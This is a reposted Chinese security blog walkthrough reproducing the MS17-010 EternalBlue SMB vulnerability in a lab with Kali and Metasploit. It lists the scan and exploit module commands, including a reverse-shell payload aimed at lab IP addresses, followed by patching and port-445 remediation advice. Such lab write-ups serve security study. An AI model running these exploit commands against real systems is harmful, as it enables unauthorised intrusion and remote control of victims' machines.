【技术分享】MS17010永恒之蓝远程代码执行漏洞复现!

admin 2024年10月17日23:09:02评论31 views字数 882阅读2分56秒阅读模式
【技术分享】MS17010永恒之蓝远程代码执行漏洞复现!

阅读须知

【技术分享】MS17010永恒之蓝远程代码执行漏洞复现!

    本公众号文章皆为网上公开的漏洞,仅供日常学习使用,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

【技术分享】MS17010永恒之蓝远程代码执行漏洞复现!

2024/10/17 星期四

多云

.

【技术分享】MS17010永恒之蓝远程代码执行漏洞复现!

.

// 前言

MS17-010也叫做“永恒之蓝”漏洞,是利用Windows Server Message Block (SMB) v1协议实现的远程代码执行漏洞,影响范围主要围绕Windows操作系统。攻击者利用MS17-010漏洞可以在未经授权的情况下远程执行任意代码,甚至可以在用户不知情的情况下获取Windows操作系统的权限。

// 漏洞复现

需要准备windows7-(含MS17010漏洞且关闭防火墙)与kali-(Metasploit Framework)两套系统。

1.开启msf(msfconsole)。

【技术分享】MS17010永恒之蓝远程代码执行漏洞复现!

2.搜索ms17-010攻击模块(search ms17-010)。

【技术分享】MS17010永恒之蓝远程代码执行漏洞复现!

3.选择漏洞辅助模块 (use auxiliary/scanner/smb/smb_ms17_010)。

【技术分享】MS17010永恒之蓝远程代码执行漏洞复现!

4.设置目标ip (set rhosts 192.168.85.136)并开始扫描(exploit)。

【技术分享】MS17010永恒之蓝远程代码执行漏洞复现!

5.发现192.168.85.136可能存在ms17-010漏洞。

【技术分享】MS17010永恒之蓝远程代码执行漏洞复现!

6.调取模块并攻击存在漏洞的主机。

use exploit/windows/smb/ms17_010_eternalblue

set payload generic/shell_reverse_tcp

set rhosts 192.168.85.136(被攻击主机ip)

set lhost 192.168.85.133(攻击主机ip)

exploit

【技术分享】MS17010永恒之蓝远程代码执行漏洞复现!

7.攻击完成后执行系统命令进行下一步攻击。

【技术分享】MS17010永恒之蓝远程代码执行漏洞复现!

// 修复方式

1.关闭445端口打开防火墙,安装安全软件。

2.安装微软发布的对应补丁或升级至无漏洞版本。

  END 

 作者 | 剁椒Muyou鱼头 

I like you,but just like you.

我喜欢你,仅仅如此,喜欢而已~

点赞在看不迷路哦

原文始发于微信公众号(剁椒Muyou鱼头):【技术分享】MS17010永恒之蓝远程代码执行漏洞复现!

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月17日23:09:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【技术分享】MS17010永恒之蓝远程代码执行漏洞复现!https://cn-sec.com/archives/3279551.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息